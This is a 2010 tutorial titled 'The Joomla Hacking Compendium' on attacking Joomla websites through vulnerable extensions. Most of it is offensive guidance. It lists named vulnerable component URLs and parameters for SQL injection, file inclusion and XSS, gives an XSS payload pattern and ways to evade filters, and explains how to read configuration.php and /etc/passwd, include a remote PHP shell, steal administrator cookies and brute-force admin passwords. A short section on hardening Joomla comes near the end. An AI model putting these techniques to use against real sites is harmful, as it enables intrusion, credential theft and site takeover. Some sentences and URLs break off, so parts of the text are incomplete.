The Joomla! Hacking Compendium













The Joomla Hacking Compendium
                                 ((or: Hacking Joomla for Phun and Profit))
[+] Title:      The Joomla Hacking Compendium
[+] Author:     Valentin Hoebel
[+] Contact:

[+] Version: 1.0
[+] Date: December 2010
[+] Almost 1000 lines of pure knowledge!
:::::::::::::::::::::::::::::: - Chapters - :::::::::::::::::::::::::::::::
0x01 - Purpose of this document
0x02 - Introduction
0x03 - The Basics of Joomla
0x04 - The Joomla core
0x05 - Joomla extensions
0x06 - Hacking Joomla
0x07 - SEO, our strongest enemy
0x08 - Examples for Joomla SQL injections
0x09 - Examples for Joomla local file inclusions
0x10 - Examples for Joomla remote file inclusions
0x11 - Examples for Joomla XSSs/CSRFs
0x12 - How to protect your Joomla
0x13 - Conclusion and a look at Joomla's feature
0x14 - How to stay informed (or: the latest vulnerabilities)
0x15 - Useful tools
0x16 - Greetings and THX

:: 0x01 - Purpose of this document

This document should provide you with security related information about
Joomla and the extensions which are available for it. This paper focuses
on how to hack Joomla installations and how to protect them. I do not
want to motivate you to go out there and hack Joomla websites after you
have read this document, this paper is more a theoretical view of how
attackers could compromise the security of a website. It should help
you to understand basic security mechanics, which finally leads you
to a point where you are able to protect Joomla websites.

I also wrote this document in order to summ up some knowledge I gained
about Joomla. I hope it will be helpful in some way and you learn
something new. If you find any typos: feel free to drop me a mail
or simply ignore them. Fuck office / word / word processor - 
vim rules!

(( This paper was written for educational purposes. Always know and
respect your local laws. ))

(( While writing this document I assumed, that the reader already
gained some knowledge about web security and Joomla. ))

:: 0x02 - Introduction

When I was looking for a new CMS for my latest project in January 2007,
I immediately fell in love with Joomla. It was small, it was easy, it
was new, it was amazing, it felt so fresh and yes, I wanted to sleep
with it! Finally someone invented a content management system which
was easy to use and supported categories in categories, basic 
magazine features, easy content handling, awesome extensions management
and was fast to install.

While I have been creating countless websites with Joomla, I never
gave security a thought at the beginning. For me it was just about
installing Joomla, applying some cool theme and uploading douzends
of extensions.

But during the years I started to realize that there are kids and
automated scripts out there which looked for vulnerable websites and
"hacked" them automatically. Without any human interaction it was poss-
ible for them to compromise a Joomla installation and make clueless
webmasters angry.

I saw so many defaced sites, being a victim for scripts and not for
skilled hackers.

When I started to do some vulnerability and security research at
March 2010 (the time when I published security related
documents for the first time), I began to focus on Joomla and the
extensions which are available for it. I had no partiuclar reasons
for it, it just happened because so many Joomla websites turned out
to be unsecure.

But I also understood that Joomla itself, the core (sounds very
sci-fi like, doesn't it), seems to be secure in most ways.
I focused on Joomla extensions and discovered many vulnerabilities,
therefore in this document we will mostly have a look at stuff which
is not part of the Joomla core.

Now grab a coffee, switch on the music (I prefer vocal trance, Tiesto
is simply awesome btw!) and be invited to dive into the deepest code lines
and dissections of Joomla. 

:: 0x03 - The Basics of Joomla

Joomla is a content management system and therefore a feature-rich
application. It is full of functions and possibilities to enhance
its functionalities, therefore there may be many attack vectors
in theory.

When you download Joomla, all you need is a webserver, PHP and MySQL
in order to run it. The download file comes with the core and at least
one example theme.

The Joomla core can be enhanced with the help of..
- modules,
- components 
- and plugins (also known as mambots).

In most cases the components are vulnerable to attacks.
The modules often only are used to display information in small
boxes on the websites and contain no features which can be used
for exploiting weak spots.

The plugins (mambots) are more likely integrated core parts, e.g.
they can be used to embed PHP code into normal Joomla articles.

The components are the most important extensions for this CMS,
they provide classical functionality, like guestbooks, message
boards, galleries, user management.. 

The Joomla core itself is almost never vulnerable for attacks.
When you browse the web, you will have a hard time finding
serious attack vendors. Only some XSS and SQL injection
vulnerabilities are known and they are already fixed.

So let's focus on the Joomla components.

:: 0x04 - The Joomla core
Before inspecting the Joomla component attack vendors we first have a
look at the core.

Download Joomla somewhere and extract all files. Open the file
and look at the code:
  var $tagsArray; // default = empty array
        var $attrArray; // default = empty array

        var $tagsMethod; // default = 0
        var $attrMethod; // default = 0

        var $xssAuto; // default = 1
        var $tagBlacklist = array ('applet', 'body', 'bgsound' [...]
        var $attrBlacklist = array ('action', 'background'     [...]

As you can see, some filter methods of Joomla are based on blacklisting.
This knowledge can be used later to exploit potential vulnerabilities in
a better way. I find this method not very effective, btw.

While HTML tags containing "body" or "bgsound" will be filtered out
at input fields or URL parameters, they can be written in many ways,
e.g. like "bOdY" or "b o DY" etc. You are only limited by your
creativity and will find ways for tricking the blacklist of the
Joomla framework.

Another interesting part is this one (same file):
 * Is there a tag? If so it will certainly start with a '<'
$tagOpen_start  = strpos($source, '<');
while ($tagOpen_start !== false)
         * Get some information about the tag we are processing
         $preTag            .= substr($postTag, 0, $tagOpen_start);
         $postTag                = substr($postTag, $tagOpen_start);

As you can see they assume that an HTML tag being used in XSS attacks
starts with a "<". In fact, I never use this character and many 
XSS cheatsheets suggest this, too. With this information in mind,
you can most likely avoid being detected by the filters. You can start
your XSS string with "><tag... for example.

If you want to you can continue looking. You will find other filter
methods and, at the end of the file, there are also built in
mechanics which should help to prevent SQL injection vulnerabilities:

$string = mysql_real_escape_string($string);

By the way, you might know that mysql_real_escape_string is not
sufficient for preventing SQL injection attacks. Just to let you know.

I highly recommend that you get yourself familiar with the Joomla framework
and the way Joomla works. A good start would be to find out where Joomla
sets some metatags. While looking for the responsible script, you will
look over many parts of the Joomla core and therefore gain a basic 
understanding of what's going on in the backstage area.

And always remember: the more you learn about Joomla, the easier it is
to exploit vulnerabilities later.

Something which takes not long for being understood is how to reach
the backend of Joomla: simply type in
in your browser and you will find the admin panel there. In most cases
there is a user called "administrator" or "admin". Try to brute force or
guess the password of that user. You will wonder how many times it is
12345 or sex or simply the website's name.

:: 0x05 - Joomla extensions

Browse and install some components. They are marked
with a green [C] sign and can be installed by visiting the Joomla backend

After having installed some of them, go to the menu management and include
some links to the components on the website. Now visit the website and
browse through the links. You will notice that the URL looks like this:

It so much looks like it contains many attack vendors and is certainly
screeming for many penetration testing sessions. Please, come and hack me!

Of course it is not that easy, but look at this URL. It contains the
following pattern:
index.php?option=	(which calls the component you are visiting)
com_blabla		(the name of the component)
&Item=2			(some ID, not very interesting)
&ItemId=5		(some ID, also not very interesting)

You realize that there is a pattern, don't you? This helps alot while
trying to hack a Joomla website.

It is often possible to add well-known variables (parameters) to the URL,
in most cases Joomla (respectively the component you are visiting) will
parse them. Some of these parameters are:
- controller
- layout
- category
- cat
- visit
- page

And you know: the more parameters there are, the more attack vendors might

:: 0x06 - Hacking Joomla

"Enough of this shit, stop talking! How do I hack it???" - Yah, yah.

Having in mind everything we learned, it is almost impossible to hack
a Joomla website core which was installed with the latest version.

Therefore we focus on the extensions (here: components; but modules are
often vulnerable to XSS attacks). Open your local Joomla test installation
(of course you don't try this on life websites, don't you?) and click
through the menu. Notice what components are installed.

There are the following attack vendors:
- look for input fields,
- look at the URL parameters,
- have a look at the source code,
- view the robots.txt,
- try to login via the admin back panel,
- have a look at the used theme (design)
- and try to find a PHPMyAdmin installation.

Concerning the attack vendors for components only, you can use
SQL injection and XSS attacks for input fields and the URL parameters.
If you don't know how to do that, I suggest you Google it up. Try googling
for "SQL injection sheet" or "XSS cheat sheet".

There are many ways for hacking Joomla and some examples will be shown in
the next chapters.

:: 0x07 - SEO, our strongest enemy

For attacking Joomla effectively, you will try to manipulate the URLs in
most cases. This can only be done when they are shown like this:

When the URLs are like this,51,blabla
you most likely encounter SEO functionallity.

SEO contains a number of methods which make websites search engine
friendly. A lot of money can be earned in this area.

SEF (search engine friendly) URLs are our strongest enemy. They
hide the original URL from us.

And when there are no parameters in the URLs, we are unable to
find parameters which take our input. But what if we are able to
reconstruct the original URL?

All we need is 
a) to know what component is currently active,
b) what parameters it takes and
c) what their current values are.

The process of reconstructing contains of obtaining information and 
some decent guessing.

Have a look at the source code of the current page and look for
"com_". You most likely will find a part which looks like this:
<input type="hidden" name="option" value="com_blabla" />
<input type="hidden" name="ItemId" value="5" />
<input type="hidden" name="Item" value="2" />
<input type="hidden" name="Entry" value="451" />
<input type="hidden" name="view" value="entries">	
Bingo! We have everything we need. The original URL is composed by the
parameters being shown in the code above. Attention: only code snippets
which do not contain Joomla default components are interesting for us.
Joomla default components could be com_content or com_search. Especially
com_search is included in almost every Joomla source code and therefore
is not very interesting for us - but the related code snippets can be

Now compose your original URL, simply fill out the well-known URL

You understand this part? Good.
We now have a URL we can work with.

Let's continue with some practical stuff.

:: 0x08 - Examples for Joomla SQL injections

The probably most common case for hacked Joomla websites is that
a SQL injection vulnerability was exploited. A typical URL which
is affected by this type of vulnerability looks like this:

Typically the following parameters are vulnerable:
- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page

You can find out if a parameter is vulnerable when you change
its value from e.g. category=5 to category='.
Press enter and look for MySQL errors in the website. If you find
one, you might have discovered a SQL inkjection vulnerability.

In order to give you a better understanding and feeling of
how vulnerable URLs might look like, I just show you some
URLs which are known to be vulnerable (I discovered them):

URL: index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter: id

URL: index.php?option=com_mv_restaurantmenumanager&task=menu_display\
Vulnerable parameter: mid

URL: index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter: katid

URL: index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter: userid

URL: index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter: cardID

URL: index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter: catid

URL: index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter: id

URL: index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter: gp

Notice how many parameters look familiar to you? Yes, I mentioned them
earlier as well-known parameters which are affected on regular
basis :)

Since every Joomla database contains the same structure (like the same
tables etc.), we know enough to inject a SQL statement:

Example #1:
username, password)--

Example #2:

Example #3:

The selected information will be shown within the website.
Select a username and password from the table and try to crack the
MD5 hash with the help of raindbow tables.

SQL injections in Joomla give us so much freedom as we can get. You can
select everything you want from the database, and if you are lucky,
there are also other tables in the databases which do not belong
to Joomla but still contain some very interesting information.

:: 0x09 - Examples for Joomla local file inclusions

Local file inclusions are very funny. You tell the website what you
want to see. Awesome! You want to view the configuration file
which contains the database login credentials? No problem.
You want to view the /etc/passwd file if Joomla is hosted
on a Linux box? You can do that.

Local file inclusions are also a common problem in Joomla extensions.
Many of them are vulnerable for this type of attack and some of them
never get fixed. This may lead to a server hack, which is not
funny any more - at least for the system administrator.

A typical URL being vulnerable to LFI looks like this:

Typically most of the vulnerable parameters are this one:
- controller
- view
- layout
- page

To give you some proper understanding of typical affected
URLs I provide you with some examples I found earlier this year:

URL: index.php?option=com_jejob&view=some_value
Vulnerable Parameter: view

URL: index.php?option=com_jeajaxeventcalendar&view=some_value
Vulnerable Parameter: view

URL: index.php?option=com_jradio&controller=some_value
Vulnerable Parameter: controller
((I didn't find this one.))

Now let's see how we can use this:

In this case we need to use the famous Nullbyte which helps us
to bypass a restriction which is set in the responsible PHP script
of the component.

In the example above the controller parameter is used to
include a file from the local hard disk. This file contains
useful information for us.

If you are not familiar with local file inclusions I recommend
you look a tutorial up since I will not explain any details here.

Now with the knowledge about a LFI vulnerability within a Joomla
component, we can try to access the configuration.php of Joomla.
This file contains very very interesting information.

Since many LFIs also reveal PHP source code, we try this one:

The source code of the file is shown and we receive the login
data for the current database user. Now find a PHPMyAdmin
login on the same server and try to login with this data.

You now have access to all Joomla tables and can basically
do what you want.

:: 0x10 - Examples for Joomla remote file inclusions

Some Joomla components are also known for containing
remote file inclusion vulnerabilities. RFIs allow us to
include files from another server and to execure code on
the target.

A typical RFI URL looks like a LFI URL. In order to
give you a better feeling of how to see a RFI vulner-
ability within seconds, I show you some examples
(I did not find this ones):

URL: index.php?option=com_sef&Itemid=&mosConfig.absolute.path=.
Vulnerable Parameter: &mosConfig.absolute.path

URL: index.php?option=com_jomestate&task=.
Vulnerable Parameter: task

When you found a RFI vulnerability, try to include your PHP
shell which is hosted on another box.
Once you uploaded it, you are able to browse all Joomla files
and download them, change them, remove them...

No Joomla installation is safe when there is an exploited

:: 0x11 - Examples for Joomla XSSs/CSRFs

XSS/CSRF vulnerabilities can mostly be found in input fields,
such as forms, guestbooks, shoutboxes and search boxes. They
allow to execute HTML/JS/VBS code within the context of the
visitor's browser.

A typical example would be to use this HTML code in order
to see if an input field or a parameter is vulnerable:
"><iframe src=>

(( Try to avoid quotes in the XSS string. They are escaped
in most cases because XSS filters do their work. ))

Notice how the XSS string starts with "> and not with a 
HTML tag itself. This is done in order to close the current
tag you are in.

Let's say you are trying this code on an input field.
The code for this field probably looks like this:
<input type="text" name="search" value="" />

When a web browser parses the source code of a website and
displays an input field, you of course do not see the source
code. But because you are able to do things with the input
field and are able to select it with your cursor, the browser
tells you that you are inside this <input..> tag now.
So while you are typing within an input box, you are
located somewhere here;
<input type="text" name="search" value="" />
So let's say you are within the quotes of the value attribute
while you type something. This means that the source code looks
like this at this point: value="SOMETHINGYOUTYPEDIN
As you can see, the quotes are not closed. So now close the
quotes and the HTML tag with your XSS string in order to
have clean and working HTML code as a result:
"><iframe src=>

When you press enter and the browser parses the code, it most
likely looks like this:
<input type="text" name="search" value=""><iframe src=http://...

You get the point?
Another reason why it is a good idea to start a XSS string with
"> and not with < is the fact that many XSS filters throw out
or espace the < when it is used in an input field.

Of course there are also components which allow including
HTML/JS/VBS code into a parameter. Here are some examples
I found:

URL: index.php?option=com_reservations&task=askope&nidser=2\
Vulnerable Parameter: namser

URL: index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0\
Vulnerable Parameter: data_search

So a good example for an URL containing a XSS string could
&namser="><iframe src=http://www.your-website-with-some\>

Now simply send this link to the administrator of the
affected Joomla website and he will have your malicious
website included within his browser. You are now able
to read out cookies, maybe create a phishing login site
which fakes the Joomla backend login etc.

Many people being interesting in IT security think that
XSS/CSRF attacks are not critical, but in my eyes you
can cause a lot of damage by injecting code into the
context of another visitor's browser.

I discovered a XSS vulnerability within Facebook a few
months ago, just let your phantasy imagine what you
could do with this knowledge when you have a criminal

Performing such attacks are a normal part of web security
and can be very dangerous, that is why they are so

:: 0x12 - How to protect your Joomla

So far whe have covered most of the hacking parts about
Joomla. Having some knowledge about web security and
having read this paper, you now should be able to
hack Joomla websites within minutes. Of course
you shouldn't do this, and I hope you only use this
knowledge in order to protect your own or other Joomla
websites ;)

Speaking of protecting Joomla... how can we prevent
kiddies and skilled "hackers" from breaking into
your Joomla installation?

At first make sure you follow these simple, but
important rules:

Always keep Joomla up2date

Always make sure you run the latest patched
versions of the extensions you used

Make sure you choose strong passwords for all

Check your own website for vulnerabilities, you
now know how to do this

Always check the webserver's log files for
potential hack attempts

Secure your server if you host your Joomla
website on a VPS or even a dedicated server

Create a list of all extensions you use and
try to monitor them. For example you can use
Google or security websites for staying
informed about the latest vulnerabilities.
Only use secure extensions.

Furthermore you can apply our secret weapon which
holds off like 90 percent of all script kiddie
and automated script attacks:

Activate the SEO features, use SEF URLs and have
fun watching your webserver logfile
(use tail -f /var/log/apache2/access_log for this)
while automated mechanisms try to hack your website,
but fail because you hide your real URLs from them :)

Furthermore most tools and scanners are not able to
work with search engine friendly URLs (I have the same
problem with my self-written tools, too :\).

This might be a big surprise, but with these
measures you already gained a decent protection

The last things to do would be to rename the Joomla
backend folder from "administrator" to may be
"admin_acp_1234567" in order to prevent kiddies
and scanners from finding your Joomla backend.

And, last but not least, protect the PHPMyAdmin
login (if you have any) with .htaccess files :)

(( You can't do this with the Joomla admin control
panel since some components need to have access to

:: 0x13 - Conclusion and a look at Joomla's feature

We have learned how to hack Joomla website and how
to protect them. We now know how attackers think and
what they try to do. They mainly focus on URL parameters
and input fields. They have a look at the robots.txt,
at the source code and try to find your Joomla backend
or the PHPMyAdmin page.

In fact hacking Joomla is not even difficult. All it 
requires is the little knowledge being described
here and some patience.

A good thing is that Joomla itself is mostly secure,
while a sad fact is that so many Joomla components are
vulnerable to attacks which could be prevented
by applying simple filter mechanisms.

The main problem is that there are so many Joomla
extensions authors who don't have a good security
awareness and simply don*t know about potential flaws
(or even worse: they just ignore them).

The Joomla team can't do anything about this,
but what they can do is maybe introduce some sort of
premium extension database. A database which lists
secure components which are tested/checked on regular
basis. With such a system it would be possible to 
create a download platform for secure addons -
some sort of premium app store, so to speak :)

Another possibility would be to force extensions
to run their input/output through filters which are
located in the Joomla framework. But as long as the
Joomla built-in methods are not good enough, this is
not a big help.

A third solution would be to only publish extensions
on when their authors have
passed some simple tests. The topics could be web
security, basic coding and secure GET/POST stuff.

Such initiatives could only come from the Joomla
community, and as long they don't run a program like
that, Joomla will remain a very unsecure CMS 
(because of the available extensions, not because
of the core).

This is maybe one of the things which prevents
the Joomla CMS from a even bigger breakthrough.

Not a small number of companies still try to avoid
using Joomla since they are concerned about security

:: 0x14 - How to stay informed (or: the latest vulnerabilities)

There are many ways to inform yourself about the latest
threads etc. One method would be to google for
"com__blablubb vulnerability", where blablubb is the name
of a component you use. If there are no serious results on
the first two pages, there is a good chance that this ex-
tension might be secure enough.

An even better idea is to open up your browser and visit and use the search feature.

An interesting project about unsecure Joomla components
is It contains a large list of
components which goes back to 2006 (the time when
Joomla emerged from Mambo). It is not complete and you
won't find any details about the vulnerabilities there,
but at least you have a list of potential threads for
your website.

And of course there is the famous
, a maybe unreliable source because the information there
is not up2date and everything is based on humans working
on that list. But still I think they do a great job, having
in mind that they work there for free.

You can see that it is easy to stay informed, so
don't be lazy and read this stuff daily.

:: 0x15 - Useful tools

Manual testing is awesome, but automated checks are faster and
maybe even more reliable. Here are some self-written tools
you could use for your purposes:

Joomla QPersonel Exploit

Automated Joomla SQL Injection Exploiter

Joomla BF Quiz Exploit

Column Fuzzer

Simple SQL Injection Vulnerability Scanner

Simple Log File Analyzer

Simple Local File Inclusion Exploiter

These tools can help you to exploit vulnerabilities
within Joomla or some extensions.

Read the help (included in those tools) for details.

The Simple Log File Analyzer could be used for
scanning your Apache log files. It shows if there
are hack attempts.

:: 0x16 - Greetings and THX

I think it is only fair when you say "thank you" from
time to time to those, who work almost daily for
Open Source software or large communities.

Greetings: JosS, cr4wl3r, Todd, Josh
Most awesome site of the moment:
Thank you: OSVDB moderators for their free work

A big hello to Wikileaks and all the idiots who try
to stop them. You can't.

ASCII FOR BREAKFAST - - Valentin Hoebel - 2010-12
:::::::::::::::::::::::::::::::: - EOF - ::::::::::::::::::::::::::::::::::